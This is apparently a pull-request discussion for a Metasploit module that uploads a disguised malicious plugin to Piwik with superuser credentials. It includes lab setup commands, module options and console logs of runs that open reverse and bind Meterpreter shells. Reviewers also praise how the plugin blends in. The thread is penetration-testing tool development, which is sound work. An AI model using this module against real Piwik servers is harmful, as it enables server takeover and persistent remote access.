add piwik superuser plugin upload module

[firefart]

This PR adds a module to upload a generated plugin to an piwik installation after you grabbed superuser credentials. This way you can turn superuser credentials into a remote code execution. The plugin also tries to enable the Marketplace plugin if it's currently deactivated. Only having admin rights is not enough for this module, you need real superuser access.

Tested with Piwik 2.14.0, 2.16.0, 2.17.1 and 3.0.1 (you can get older versions from https://builds.piwik.org/)

To install on debian as root:

apt install apache2 php5 php5-mysql libapache2-mod-php5 mariadb-server unzip php5-gd php5-curl

wget https://builds.piwik.org/piwik.zip
unzip -d /var/www/html/ piwik.zip 
chown -R www-data:www-data /var/www/html/

mysql -u root -ppassword -e "CREATE DATABASE piwik;"
mysql -u root -ppassword -e "CREATE USER piwik@localhost;"
mysql -u root -ppassword -e "SET PASSWORD FOR piwik@localhost=PASSWORD('piwik');"
mysql -u root -ppassword -e "GRANT ALL PRIVILEGES ON piwik.* TO piwik@localhost;"
mysql -u root -ppassword -e "FLUSH PRIVILEGES;"

echo always_populate_raw_post_data=-1 > /etc/php5/apache2/conf.d/99-piwik.ini
service apache2 restart

After the install browse to http://IP/piwik/ and follow the installation steps. If you have an ad blocker installed you need to disable it for the site otherwise almost everything will be blocked.

Be sure to also deactivate the Marketplace plugin in Settings-->System-->Plugins to test this feature.

To test other piwik versions too:

wget https://builds.piwik.org/piwik-2.17.1.zip
unzip piwik-2.17.1.zip
mv piwik /var/www/html/piwik217
chown -R www-data:www-data /var/www/html/
mysql -u root -ppassword -e "CREATE DATABASE piwik217;"
mysql -u root -ppassword -e "CREATE USER piwik217@localhost;"
mysql -u root -ppassword -e "SET PASSWORD FOR piwik217@localhost=PASSWORD('piwik217');"
mysql -u root -ppassword -e "GRANT ALL PRIVILEGES ON piwik217.* TO piwik217@localhost;"
mysql -u root -ppassword -e "FLUSH PRIVILEGES;"

wget https://builds.piwik.org/piwik-2.16.0.zip
unzip piwik-2.16.0.zip
mv piwik /var/www/html/piwik216
chown -R www-data:www-data /var/www/html/
mysql -u root -ppassword -e "CREATE DATABASE piwik216;"
mysql -u root -ppassword -e "CREATE USER piwik216@localhost;"
mysql -u root -ppassword -e "SET PASSWORD FOR piwik216@localhost=PASSWORD('piwik216');"
mysql -u root -ppassword -e "GRANT ALL PRIVILEGES ON piwik216.* TO piwik216@localhost;"
mysql -u root -ppassword -e "FLUSH PRIVILEGES;"

wget https://builds.piwik.org/piwik-2.14.0.zip
unzip piwik-2.14.0.zip
mv piwik /var/www/html/piwik214
chown -R www-data:www-data /var/www/html/
mysql -u root -ppassword -e "CREATE DATABASE piwik214;"
mysql -u root -ppassword -e "CREATE USER piwik214@localhost;"
mysql -u root -ppassword -e "SET PASSWORD FOR piwik214@localhost=PASSWORD('piwik214');"
mysql -u root -ppassword -e "GRANT ALL PRIVILEGES ON piwik214.* TO piwik214@localhost;"
mysql -u root -ppassword -e "FLUSH PRIVILEGES;"

wget https://builds.piwik.org/piwik-1.12.zip
unzip piwik-1.12.zip
mv piwik /var/www/html/piwik112
chown -R www-data:www-data /var/www/html/
mysql -u root -ppassword -e "CREATE DATABASE piwik112;"
mysql -u root -ppassword -e "CREATE USER piwik112@localhost;"
mysql -u root -ppassword -e "SET PASSWORD FOR piwik112@localhost=PASSWORD('piwik112');"
mysql -u root -ppassword -e "GRANT ALL PRIVILEGES ON piwik112.* TO piwik112@localhost;"
mysql -u root -ppassword -e "FLUSH PRIVILEGES;"

Sample Output:

msf exploit(piwik_admin_plugin_upload) > options

Module options (exploit/unix/webapp/piwik_admin_plugin_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   firefart         yes       The Piwik password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.56.2     yes       The target address
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /piwik/          yes       The URI path of the Piwik installation
   USERNAME   firefart         yes       The Piwik username to authenticate with
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Piwik


msf exploit(piwik_admin_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Try to detect if target is running piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:firefart...
[+] Authenticated with Piwik
[*] Trying to get Piwik version
[+] Detected Piwik version 3.0.1
[*] Checking if Marketplace plugin is active
[+] Seems like the Marketplace plugin is already enabled
[*] Generating plugin...
[*] Uploading plugin...
[*] Activating plugin and triggering payload
[*] Sending stage (33986 bytes) to 192.168.56.2
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.2:48145) at 2017-02-06 10:06:47 +0100
[+] Deleted plugins/PRDAvCIKBY/plugin.json
[+] Deleted plugins/PRDAvCIKBY/PRDAvCIKBY.php

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.56.2 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(piwik_admin_plugin_upload) > set TARGETURI /piwik217/
TARGETURI => /piwik217/
msf exploit(piwik_admin_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Try to detect if target is running piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:firefart...
[+] Authenticated with Piwik
[*] Trying to get Piwik version
[+] Detected Piwik version 2.17.1
[*] Checking if Marketplace plugin is active
[+] Seems like the Marketplace plugin is already enabled
[*] Generating plugin...
[*] Uploading plugin...
[*] Activating plugin and triggering payload
[*] Sending stage (33986 bytes) to 192.168.56.2
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.2:48158) at 2017-02-06 10:07:14 +0100
[+] Deleted plugins/ygpstFTvqz/plugin.json
[+] Deleted plugins/ygpstFTvqz/ygpstFTvqz.php

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.56.2 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(piwik_admin_plugin_upload) > set TARGETURI /piwik216/
TARGETURI => /piwik216/
msf exploit(piwik_admin_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Try to detect if target is running piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:firefart...
[+] Authenticated with Piwik
[*] Trying to get Piwik version
[+] Detected Piwik version 2.16.0
[*] Generating plugin...
[*] Uploading plugin...
[*] Activating plugin and triggering payload
[*] Sending stage (33986 bytes) to 192.168.56.2
[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.2:48168) at 2017-02-06 10:07:31 +0100
[+] Deleted plugins/lmepCZtuzN/plugin.json
[+] Deleted plugins/lmepCZtuzN/lmepCZtuzN.php

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.56.2 - Meterpreter session 3 closed.  Reason: User exit
msf exploit(piwik_admin_plugin_upload) > set TARGETURI /piwik214/
TARGETURI => /piwik214/
msf exploit(piwik_admin_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Try to detect if target is running piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:firefart...
[+] Authenticated with Piwik
[*] Trying to get Piwik version
[+] Detected Piwik version 2.14.0
[*] Generating plugin...
[*] Uploading plugin...
[*] Activating plugin and triggering payload
[*] Sending stage (33986 bytes) to 192.168.56.2
[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.2:48177) at 2017-02-06 10:07:46 +0100
[+] Deleted plugins/DhPhZeafJf/plugin.json
[+] Deleted plugins/DhPhZeafJf/DhPhZeafJf.php

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.56.2 - Meterpreter session 4 closed.  Reason: User exit
msf exploit(piwik_admin_plugin_upload) > set TARGETURI /piwik112/
TARGETURI => /piwik112/
msf exploit(piwik_admin_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Try to detect if target is running piwik
[-] Exploit aborted due to failure: not-found: The target does not appear to be running Piwik
[*] Exploit completed, but no session was created.

meterpreter > sysinfo
Computer    : web
OS          : Linux web 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1 (2016-12-30) x86_64
Meterpreter : php/linux
meterpreter > 

[h00die]

I'll make you a deal. If you add module docs, i'll review this within the next 48hrs

[firefart]

@h00die deal :) documentation added

[wvu]

I nominate @h00die as documentation czar.

[h00die]

@wvu-r7

1. theres no challengers
2. i thought that was already agreed to

[firefart]

@wvu-r7

[wvu]

@h00die: We should give you a badge.

[h00die]

Had some oddities but I think its due to my own configuration of running virtualbox and the portforwarding.
However, it did give me all the shells. I know @egypt <3 shells, and its valentines day and all... but shells picked me over him this time.

for completeness, i used a bind shell, and Ubuntu 14.04.

msf exploit(piwik_superuser_plugin_upload) > exploit

[*] Trying to detect if target is running a supported version of piwik
[*] Started bind handler
[*] Sending stage (33986 bytes) to 127.0.0.1
[+] Detected Piwik installation
[*] Authenticating with Piwik using admin:adminadmin...
[*] Meterpreter session 1 opened (127.0.0.1:44559 -> 127.0.0.1) at 2017-02-14 00:40:13 -0500
[-] Meterpreter session 1 is not valid and will be closed
[*] 127.0.0.1 - Meterpreter session 1 closed.
[+] Authenticated with Piwik
[*] Checking if user admin has superuser access
[+] User admin has superuser access
[*] Trying to get Piwik version
[+] Detected Piwik version 3.0.1
[*] Checking if Marketplace plugin is active
[+] Seems like the Marketplace plugin is already enabled
[*] Generating plugin
[+] Plugin XmZeBDefEZ generated
[*] Uploading plugin
[*] Activating plugin and triggering payload
[!] This exploit may require manual cleanup of 'plugins/XmZeBDefEZ/plugin.json' on the target
[!] This exploit may require manual cleanup of 'plugins/XmZeBDefEZ/XmZeBDefEZ.php' on the target

[-] Invalid session identifier: 1
msf exploit(piwik_superuser_plugin_upload) > exploit

[*] Started bind handler
[*] Trying to detect if target is running a supported version of piwik
[*] Sending stage (33986 bytes) to 127.0.0.1
[+] Detected Piwik installation
[*] Authenticating with Piwik using admin:adminadmin...
[*] Meterpreter session 2 opened (127.0.0.1:40109 -> 127.0.0.1:1337) at 2017-02-14 00:40:36 -0500
[+] Authenticated with Piwik
[*] Checking if user admin has superuser access
[+] User admin has superuser access
[*] Trying to get Piwik version
[+] Detected Piwik version 3.0.1
[*] Checking if Marketplace plugin is active
[+] Seems like the Marketplace plugin is already enabled
[*] Generating plugin
[+] Plugin lCEYgTsmXq generated
[*] Uploading plugin
[*] Activating plugin and triggering payload
[!] This exploit may require manual cleanup of 'plugins/lCEYgTsmXq/plugin.json' on the target
[!] This exploit may require manual cleanup of 'plugins/lCEYgTsmXq/lCEYgTsmXq.php' on the target

meterpreter > sysinfo
Computer    : piwiki
OS          : Linux piwiki 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64
Meterpreter : php/linux

[h00die]

Several things that are VERY nice about this module:
GPL license blends in with the rest (not sure if you manually set that)
Author is Piwik, which blends in nicely
version numbers are randomized, but look legit.

[h00die]

docs are beautiful. @wvu-r7 you should take notes 😛

[h00die]

seriously though, the code is beautiful.

[h00die]

Release Notes

An exploit for Piwik is now available. An authenticated super user can upload a malicious plugin that causes remote code execution.

[firefart]

Thanks @h00die :)

[wvu]

Duly noted! Fantastic work as always, @firefart. :D